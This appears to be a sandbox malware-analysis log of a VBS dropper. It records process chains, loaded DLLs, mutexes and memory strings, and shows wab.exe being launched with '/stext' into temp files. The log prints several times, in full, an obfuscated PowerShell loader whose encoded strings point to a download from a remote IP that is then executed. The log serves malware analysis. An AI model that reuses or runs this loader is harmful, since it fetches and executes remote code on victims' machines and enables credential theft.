Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 14_2_004182CE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification, 16_2_00410DE1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z, 14_2_00418758
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle, 14_2_00413D4C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy, 14_2_0040B58D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Dobbeltrudens140.Aff Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-SACUXX
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6112:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3784:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ja312hy.thz.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs"
Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3516
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5512
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: wab.exe, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wab.exe, wab.exe, 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: wab.exe, 0000000A.00000002.3385163166.00000000217B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: wab.exe, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: wab.exe, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: wab.exe, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: wab.exe, 0000000E.00000003.2602870867.00000000052F5000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.2605548747.00000000052F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: wab.exe, wab.exe, 0000000E.00000002.2604837057.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Program Files (x86)\Windows Mail\wab.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xmgittpzhob"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iglbtlabvwtooe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\kiztuekujelbqlwip"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteer Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dobbeltrudens140.Aff && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xmgittpzhob" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iglbtlabvwtooe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\kiztuekujelbqlwip" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
